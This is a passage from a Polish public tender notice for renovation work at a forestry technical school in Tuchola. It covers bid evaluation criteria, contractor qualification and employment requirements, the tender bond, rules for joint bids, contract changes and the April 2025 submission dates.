podstawie<br/>kryteriów oceny ofert określonych w SWZ.<br/>1.2. Kryteriami oceny ofert przedmiotu zamówienia są:<br/>opis kryteriów oceny<br/>znaczenie<br/>A. cena 60%<br/>B. okres gwarancji jakości 40%<br/>A/ KRYTERIUM CENY ŁĄCZNEJ BRUTTO (max. 60 pkt.) – zastosowanie będzie miał następujący wzór, wykorzystywany przy<br/>ocenie oferty:<br/>cena oferowana najniższa<br/>A = --------------------------------------------- x 100 pkt. x 60%<br/>cena oferty badanej<br/>B/ KRYTERIUM OKRESU GWARANCJI JAKOŚCI (max. 20 pkt )–zastosowanie będzie miał następujący wzór, wykorzystywany przy<br/>ocenie oferty:<br/>okres gwarancji jakości oferty badanej<br/>w miesiącach<br/>B = ---------------------------------------------------------------- x 100 pkt. x 40<br/>badanych ofert<br/>Minimalny okres gwarancji jakości wynosi 36 miesięcy, liczony od dnia odbioru końcowego przedmiotu zamówienia.<br/>Maksymalny okres gwarancji jakości oceniany przez Zamawiającego wynosi 60 miesięcy.<br/>UWAGA!<br/>Podanie w ofercie okresu gwarancji jakości krótszego niż 36 miesięcy lub brak podania okresu gwarancji w formularzu ofertowym<br/>będzie skutkować odrzuceniem oferty. W przypadku zaproponowania przez Wykonawcę okresu gwarancji jakości wynoszącego<br/>więcej niż 60 miesięcy oceniona będzie wartość 60 miesięcy.<br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane są punkty za powyższe kryteria. Zastosowanie<br/>będzie miał następujący wzór<br/>P (punkty)= A + B</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>rozdz. 6 i 7 SWZ oraz spełniają warunki udziału w postępowaniu<br/>w zakresie:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w<br/>sposób szczególny,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w<br/>sposób szczególny,<br/>3) sytuacji ekonomicznej lub finansowej:W celu potwierdzenia sytuacji finansowej pozwalającej na realizację przedmiotu zamówienia, Wykonawca wykaże, iż<br/>posiada w środkach pieniężnych kwotę 400 000,00 zł, lub posiada zdolność kredytową na tę kwotę.<br/>4) zdolności technicznej lub zawodowej:<br/>B (dotyczy wykazu robót):<br/>wykonanie przynajmniej jednej roboty za min. 300.000,00 zł brutto – polegającej na remoncie/przebudowie budynku w<br/>zakresie odpowiadającym zakresowi robót budowlanych (wykonanie instalacji elektrycznej, sanitarnej oraz robót<br/>polegających na pracach wykończeniowych tj. montaż drzwi, układanie glazury itp.) stanowiącym przedmiot zamówienia<br/>oraz aby dołączył do ww. wykazu min. 1 szt. referencji na wykonane roboty, oraz aby te roboty wykonane były nie wcześniej<br/>niż w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie, wraz z podaniem jej rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których<br/>robota ta została wykonana z załączeniem dowodu określającego, czy ta robota budowlana została wykonana należycie, w<br/>szczególności informacji o tym czy robota została wykonana zgodnie z przepisami prawa budowlanego i prawidłowo<br/>ukończona.<br/>Wykazane referencje muszą jasno określać zakres wykonanych robót przez Wykonawcę.<br/>B (dotyczy wykazu osób):<br/>1. skieruje do realizacji przedmiotowego zamówienia min. jedną osobę z niżej wymienionej branży posiadającą uprawnienia<br/>do kierowania i nadzorowania robotami budowlanymi w zakresie odpowiadającym wymienionym niżej wymienionej branży<br/>lub posiadającą inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w<br/>aktualnym stanie prawnym uprawniają uprawnienia budowlane wymienionych niżej specjalności: Zamawiający wymaga, aby<br/>Wykonawca dysponował osobami pełniącymi funkcje:<br/> kierownika budowy, posiadającą uprawnienia w specjalności konstrukcyjno-budowlane oraz będącym członkiem właściwej<br/>Izby Inżynierów Budownictwa.<br/>Wykonawca skieruje do realizacji zamówienia ww. osoby, które w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo<br/>budowlane (t. j. - Dz. U. z 2024 r. poz. 725 ze zm.) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dn. 29.04.2019 r.<br/>w sprawie przygotowania zawodowego posiadają niezbędne kwalifikacje do wykonywania samodzielnych funkcji<br/>technicznych w budownictwie (Dz.U. z 2019 r. poz. 831).<br/>Dopuszcza się łączenie funkcji, o których mowa powyżej, przez jedną osobę pod warunkiem, że osoba ta będzie posiadała<br/>wymagane kwalifikacje.<br/>Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im<br/>uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z<br/>zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (t. j. – Dz. U. z 2020 r. poz. 1333ze zm.) oraz<br/>ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z<br/>2021 r. poz. 1646).<br/>2. ponadto Wykonawca skieruje do realizacji przedmiotowego zamówienia:<br/>a) Zamawiający wymaga zatrudnienia na podstawie stosunku pracy przez wykonawcę lub podwykonawcę osób<br/>wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia min. 5 osób zatrudnionych na podstawie umowy<br/>o pracę, które będą uczestniczyły w realizacji przedmiotowego zamówienia, poprzez wykonywanie czynności przez te<br/>osoby.<br/>W celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie stosunku pracy przez wykonawcę lub podwykonawcę<br/>osób wykonujących wskazane ww. punkcie czynności w trakcie realizacji zamówienia:<br/>1) oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie stosunku pracy osób uczestniczących w<br/>realizacji przedmiotowego zamówienia,<br/>2) poświadczone za zgodność z oryginałem kopie umów o pracę zatrudnionych pracowników wykonujących<br/>uczestniczących w realizacji przedmiotowego zamówienia.<br/>Powyższe dokumenty muszą zawierać informacje, w tym dane osobowe, niezbędne do weryfikacji zatrudnienia na<br/>podstawie umowy o pracę, w szczególności imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę,<br/>rodzaj umowy o pracę i zakres obowiązków pracownika.<br/>b) Zamawiający wymaga zatrudnienia przez wykonawcę do realizacji zamówienia 1 osoby niepełnosprawnej - w rozumieniu<br/>ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych i 1 osoby<br/>- po ukończeniu 50. roku życia, posiadającej status osoby poszukującej pracy, bez zatrudnienia. Należy wskazać<br/>wykonywane czynności przez osoby wymienione powyżej.<br/>W celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie stosunku pracy przez wykonawcę lub podwykonawcę<br/>osób wykonujących wskazane ww. punkcie czynności w trakcie realizacji zamówienia:<br/>1) oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie stosunku pracy osób uczestniczących w<br/>realizacji przedmiotowego zamówienia,<br/>2) poświadczone za zgodność z oryginałem kopie umów o pracę zatrudnionych pracowników wykonujących<br/>uczestniczących w realizacji przedmiotowego zamówienia.<br/>3) status niepełnosprawnego określony ma być na podstawie posiadanego orzeczenia o niepełnosprawności lub orzeczenia<br/>o stopniu niepełnosprawności (znacznym lub umiarkowanym, lub lekkim) lub orzeczenia o długotrwałej niezdolności do<br/>pracy w gospodarstwie rolnym, wydanego przez zespół do spraw orzekania o niepełnosprawności lub lekarza orzecznika<br/>ZUS lub KRUS- dotyczy 1 niepełnosprawnej,<br/>4) dokumenty wystawione przez Powiatowy Urząd Pracy potwierdzające posiadanie statusu osoby bezrobotnej/osoby<br/>poszukującej pracy/ osoby bez zatrudnienia potwierdzające spełnienie wymagań określonych przez zamawiającego –<br/>dotyczy 1 osoby po ukończeniu 50 roku życia.Niezłożenie przez wykonawcę w wyznaczonym przez zamawiającego terminie żądanych przez zamawiającego dowodów w<br/>celu potwierdzenia spełnienia przez wykonawcę wymogu zatrudnienia traktowane będzie na równi z niespełnieniem przez<br/>wykonawcę ww. wymogu.<br/>Osoby wymienione w punkcie a i b muszą być zatrudnione na podstawie umowy o pracę - co musi wykazać Wykonawca.<br/>Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadane przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia:<br/>1. oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616 ze zm.), z innym<br/>wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>według wzoru stanowiącego załącznik nr 9 do SWZ.<br/>2. oświadczenie Wykonawcy o aktualności oświadczenia składanego na podst. art. 125 ust.1.ustawy Pzp oraz art. 7 ust. 1 ustawy z<br/>dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspierania agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego (Dz.U. z 2024r. poz. 507 ze zm.) według wzoru stanowiącego załącznik nr 10 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">9.2.1.1.<br/>wykaz robót - wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz, których roboty te zostały wykonane,<br/>według wzoru stanowiącego załącznik nr 7 do SWZ wraz z dowodami dot. robót wskazanych w wykazie robót budowlanych,<br/>potwierdzające, że roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych<br/>od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>9.2.1.2. wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami według wzoru stanowiącego<br/>załącznik nr 8 i 8a do SWZ.<br/>a) dotyczy min. 5 osób zatrudnionych na podstawie umowy o pracę, które będą uczestniczyły w realizacji przedmiotowego<br/>zamówienia Wykonawca złoży:<br/>1) oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie stosunku pracy osób uczestniczących w realizacji<br/>przedmiotowe go zamówienia,<br/>2) poświadczone za zgodność z oryginałem kopie umów o pracę zatrudnionych pracowników wykonujących uczestniczących w<br/>realizacji przedmiotowego zamówienia.<br/>Powyższe dokumenty muszą zawierać informacje, w tym dane osobowe, niezbędne do weryfikacji zatrudnienia na podstawie umowy<br/>o pracę, w szczególności imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy o pracę i zakres<br/>obowiązków pracownika.<br/>b) zatrudnienie 1 osoby niepełnosprawnej - w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej<br/>oraz zatrudnianiu osób niepełnosprawnych i 1 osoby - po ukończeniu 50. roku życia, posiadającej status osoby poszukującej pracy,<br/>bez zatrudnienia. Należy wskazać wykonywane czynności przez osoby wymienione powyżej.<br/>W celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie stosunku pracy przez wykonawcę lub podwykonawcę osób<br/>wykonujących wskazane ww. punkcie czynności w trakcie realizacji zamówienia:<br/>1) oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie stosunku pracy osób uczestniczących w realizacji<br/>przedmiotowego zamówienia,<br/>2) poświadczone za zgodność z oryginałem kopie umów o pracę zatrudnionych pracowników wykonujących uczestniczących w<br/>realizacji przedmiotowego zamówienia.<br/>3) status niepełnosprawnego określony ma być na podstawie posiadanego orzeczenia o niepełnosprawności lub orzeczenia o<br/>stopniu niepełnosprawności (znacznym lub umiarkowanym, lub lekkim) lub orzeczenia o długotrwałej niezdolności do pracy w<br/>gospodarstwie rolnym, wydanego przez zespół do spraw orzekania o niepełnosprawności lub lekarza orzecznika ZUS lub KRUSdotyczy<br/>1 niepełnosprawnej,<br/>4) dokumenty wystawione przez Powiatowy Urząd Pracy potwierdzające posiadanie statusu osoby bezrobotnej/osoby poszukującej<br/>pracy/ osoby bez zatrudnienia potwierdzające spełnienie wymagań określonych przez zamawiającego – dotyczy 1 osoby po<br/>ukończeniu 50 roku życia.<br/>9.2.1.3. informacje z banku lub spółdzielczej kasy oszczędnościowo – kredytowej potwierdzające wysokość posiadanych środków<br/>finansowych lub zdolność kredytową Wykonawcy w okresie nie wcześniejszym niż 2 miesiące przed upływem terminu składania<br/>ofert.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>6. PODSTAWY WYKLUCZENIA, O KTÓRYCH MOWA W ART. 108 UST. 1 ORAZ 109 UST. 1 USTAWY PZP<br/>Z postępowania o udzielenie zamówienia wyklucza się, z zastrzeżeniem art. 110 ust. 2 Pzp, Wykonawcę -szczegółowy opis<br/>zawarto w rozdziale 6 SWZ.<br/>Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę wobec którego zachodzi podstawa wykluczenia<br/>przewidziana w art.7 ust.1. ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałaniawspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022r. poz. 835) -<br/>zamawiający informacje o ww. wykluczeniach zamieszczono w rozdziale 7 SWZ - Zapisy o niepodleganiu wykluczeniu na<br/>podst. ww. ustawy zamieszczono w zał. 3 do SWZ.<br/>10.16. Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenie, o którym mowa w rozdz. 9 pkt 1 ppkt 1) niniejszej specyfikacji – załącznik nr 3 do SWZ,<br/>2) oświadczenie, , o którym mowa w rozdz. 9 pkt 1 ppkt 2) niniejszej specyfikacji – załącznik nr 4 do SWZ,<br/>3) pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu wykonawcy, jeżeli nie wynika to bezpośrednio<br/>z dokumentów rejestrowych lub w przypadku o którym mowa w art. 58 ust. 2 ustawy Prawo zamówień publicznych.<br/> Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie<br/>elektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym).Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97<br/>§ 2 ustawy z dnia 14.02.1991r. – Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem<br/>elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej<br/>kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa<br/>nie może być uwierzytelniona przez upełnomocnionego – wzór pełnomocnictwa załącznik nr 10. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium wskazując tytuł:<br/>„Prace remontowo-modernizacyjne na poziomie piętra i parteru w Technikum Leśnym w Tucholi im. Adama Loreta”,<br/>wadium, nr postępowania:<br/>Zamawiający wymaga wniesienia wadium, w wysokości: 6 000,00 zł (słownie: sześć dziesięć tysięcy zł 00/100).<br/>15.2. Wadium wniesione w pieniądzu będzie wniesione skutecznie, jeżeli rachunek bankowy<br/>Zamawiającego zostanie uznany kwotą wadium przed upływem terminu składania ofert (tj. przed upływem dnia i godziny<br/>wyznaczonej jako ostateczny termin składania ofert).<br/>15.3. Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego:<br/>50 1010 1078 0052 9413 9120 0000<br/>15.4. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2019 r. ze zm. poz. 310, 836 i 1572).<br/>15.5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>15.6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 15.4.<br/>ppkt 2)-4), Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w<br/>postaci elektronicznej, podpisany kwalifikowanym podpisem elektronicznym przez wystawcę<br/>dokumentu.<br/>15.7. W przypadku wniesienia wadium w innej formie niż w pieniądzu, z treści gwarancji i poręczeń<br/>musi wynikać bezwarunkowe, nieodwołalne i na pierwsze żądanie Zamawiającego<br/>(beneficjenta) zobowiązanie Gwaranta do zapłaty na rzecz Zamawiającego kwoty wadium<br/>w okolicznościach skutkujących zatrzymaniem wadium określonych w art. 98 ust. 6<br/>ustawy Pzp.<br/>15.8. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie<br/>utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot<br/>wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zostanie odrzucona.<br/>15.9. Zamawiający niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/>przez Wykonawcę zwraca wadium Wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo<br/>nie upłynął termin do jego wniesienia.<br/>15.10. Złożenie wniosku o zwrot wadium, o którym mowa w pkt 15.9, powoduje rozwiązanie<br/>stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków<br/>ochrony prawnej.<br/>15.11. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy<br/>rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty<br/>prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunekbankowy wskazany przez Wykonawcę.<br/>15.12. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub<br/>poręczycielowi oświadczenia o zwolnieniu wadium.<br/>Szczegółowe informacje dotyczące wadium opisano w rozdz. 14 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 17.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>17.2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w<br/>rozdziale 9 pkt 9.1., składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>17.3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>17.4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w rozumieniu art. 58 ustawy) są obowiązani do<br/>ustanowienia pełnomocnika i złożenia wraz z ofertą pełnomocnictwa do reprezentowania Wykonawców w postępowaniu<br/>albo reprezentowania Wykonawców w postępowaniu i zawarcia umowy.<br/>17.5. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest<br/>upoważniony. W przypadku gdyby pełnomocnictwa udzielała osoba inna niż uprawniona z mocy prawa lub umowy spółki do<br/>reprezentowania podmiotu, do oferty należy dołączyć również pełnomocnictwo do dokonania tej czynności.<br/>17.6. Pełnomocnictwa powinny być dołączone do oferty w oryginale w formie dokumentu elektronicznego opatrzonego<br/>kwalifikowanym podpisem elektronicznym.<br/>17.7. Do udzielenia pełnomocnictwa dla osoby, o której mowa w pkt. 17.5, postanowienia pkt. 17.4. i 17.6. stosuje się<br/>odpowiednio.<br/>17.8. Wspólników spółki cywilnej obowiązują przepisy dotyczące Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa w art. 58 ustawy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej<br/>umowy, określone zostały w załączniku nr 12do SWZ.<br/>1.2. Zgodnie z załącznikiem nr 12 do SWZ – wzorem umowy, Zamawiający dopuszcza możliwość wprowadzenia zmian<br/>umowy na podstawie art. 455 ustawy Prawo zamówień publicznych (j. t. Dz. U. z 2024 r. poz. 1320 z późn. zm. ) istnieje<br/>możliwość dokonania zmiany umowy w formie aneksu pod warunkami wymienionymi w § 17 - zmiany umowy:<br/>„Zgodnie z treścią art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania<br/>zmian postanowień zawartej umowy w stosunku do treści oferty Wykonawcy.<br/>1. Zmiany istotnych postanowień umowy, na skutek wystąpienia poniższych okoliczności mogą dotyczyć następujących jej<br/>elementów:<br/>1.1 terminu wykonania zamówienia:<br/>opóźnienie w przekazaniu terenu budowy z przyczyn zależnych od Zamawiającego,<br/>1.1.a) konieczność udzielenia zamówienia dodatkowego, nieobjętego zamówieniem podstawowym, którego wykonanie stało<br/>się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:<br/>􀀀 z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego<br/>wymagałoby poniesienia niewspółmiernie wysokich kosztów,<br/>􀀀 prawidłowe wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego,<br/>1.1.b) istotne braki lub błędy w dokumentacji projektowej, również te polegające na niezgodności dokumentacji z przepisami<br/>prawa,<br/>1.1.c) wprowadzenie zmian w dokumentacji techniczno – projektowej, co może powodować brak możliwości dotrzymania<br/>pierwotnego terminu zakończenia realizacji zawartej umowy,<br/>1.1.d) uzasadnione zmiany w zakresie sposobu wykonania przedmiotu zamówienia proponowane przez Zamawiającego lub<br/>Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,<br/>1.1.e) wystąpienie okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji<br/>przedmiotu umowy,<br/>(...) Szczegółowe informacje dotyczące zmiany umowy zawarto w SWZ rozdz. 20 oraz ze wzorze umowy stanowiącym zał. nr 12 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert odbywa się przy użyciu Platformy e-Zamówienia (szczególowe informacje rozdz. 13 SWZ), która jest dostępna pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-15 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> przewidziana w art. 7 ust.1. ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022r. poz. 835) . Wymagane<br/>jest oświadczenie o niepodleganiu wykluczeniu na podst. w.w. ustawy. Zapis o niepodleganiu umieszczono w oświadczeniu<br/>składanym na podst. art.125 ust.1 ust. Pzp (zał.3, zał.4 do SWZ) oraz oświadczeniu o aktualności oświadczenia wykonawcy<br/>o niepodleganiu wykluczeniu (zał. nr 10 do SWZ). Zamawiający zawrze umowę z Wykonawcą, który złożył najkorzystniejszą<br/>ofertę w niniejszym postępowaniu.<br/>19.1. Zamawiający zawrze umowę z Wykonawcą, który złożył najkorzystniejszą ofertę w niniejszym postępowaniu.<br/>19.2. Zamawiający zawiera umowę w sprawie zamówienia publicznego, w terminie nie krótszym niż 5 dni od dnia przesłania<br/>zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało przesłane przy użyciu środków<br/>komunikacji elektronicznej, albo 10 dni, jeżeli zostało przesłane w inny sposób, z uwzględnieniem art. 577 Pzp.<br/>19.3. Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w pkt<br/>19.2, jeżeli w postępowaniu o udzielenie zamówienia w trybie podstawowym złożono tylko jedną ofertę.<br/>19.4. Wykonawca, którego oferta uznana zostanie za 